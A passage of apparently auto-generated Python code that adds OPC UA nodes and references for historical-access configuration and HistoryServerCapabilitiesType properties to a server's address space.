ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2325, 0)
node.BrowseName = QualifiedName('MaxTimeInterval', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxTimeInterval")
attrs.DataType = NumericNodeId(290, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2326, 0)
node.BrowseName = QualifiedName('MinTimeInterval', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MinTimeInterval")
attrs.DataType = NumericNodeId(290, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2327, 0)
node.BrowseName = QualifiedName('ExceptionDeviation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Double)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2328, 0)
node.BrowseName = QualifiedName('ExceptionDeviationFormat', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviationFormat")
attrs.DataType = NumericNodeId(890, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11499, 0)
node.BrowseName = QualifiedName('StartOfArchive', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartOfArchive")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11500, 0)
node.BrowseName = QualifiedName('StartOfOnlineArchive', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartOfOnlineArchive")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
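# 'HA Configuration' (NodeId 11202): an instance node typed as
# HistoricalDataConfigurationType (2318), carrying its own AggregateConfiguration
# object (11203) and Stepped property (11208).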
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11202, 0)
node.BrowseName = QualifiedName('HA Configuration', 0)
node.NodeClass = NodeClass.Object
node.TypeDefinition = NumericNodeId(2318, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HA Configuration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11208, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11203, 0)
node.BrowseName = QualifiedName('AggregateConfiguration', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(11202, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(11187, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateConfiguration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11204, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11205, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11206, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11207, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11187, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11202, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11204, 0)
node.BrowseName = QualifiedName('TreatUncertainAsBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("TreatUncertainAsBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11204, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11204, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11205, 0)
node.BrowseName = QualifiedName('PercentDataBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11205, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11205, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11206, 0)
node.BrowseName = QualifiedName('PercentDataGood', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataGood")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11206, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11206, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11207, 0)
node.BrowseName = QualifiedName('UseSlopedExtrapolation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UseSlopedExtrapolation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11207, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11207, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11208, 0)
node.BrowseName = QualifiedName('Stepped', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11202, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Stepped")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11208, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11208, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11202, 0)
refs.append(ref)
server.add_references(refs)
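# Standalone property declaration: HistoricalEventFilter (NodeId 11215), a Variable
# with no parent node; its DataType NodeId 725 is assumed here to be the EventFilter
# structure.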
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11215, 0)
node.BrowseName = QualifiedName('HistoricalEventFilter', 0)
node.NodeClass = NodeClass.Variable
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("HistoricalEventFilter")
attrs.DataType = NumericNodeId(725, 0)
attrs.ValueRank = -2
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11215, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
server.add_references(refs)
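# HistoryServerCapabilitiesType (NodeId 2330): ObjectType whose Boolean and UInt32
# properties (AccessHistoryData/EventsCapability, MaxReturnData/EventValues, and the
# insert/replace/update/delete capability flags defined below) advertise which
# history operations a server supports.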
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2330, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilitiesType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(58, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilitiesType")
attrs.IsAbstract = False
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2331, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2332, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11269, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2334, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2335, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2336, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2337, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2338, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11278, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11279, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11280, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11501, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11270, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11172, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(58, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2331, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2332, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11268, 0)
node.BrowseName = QualifiedName('MaxReturnDataValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnDataValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11269, 0)
node.BrowseName = QualifiedName('MaxReturnEventValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnEventValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2334, 0)
node.BrowseName = QualifiedName('InsertDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
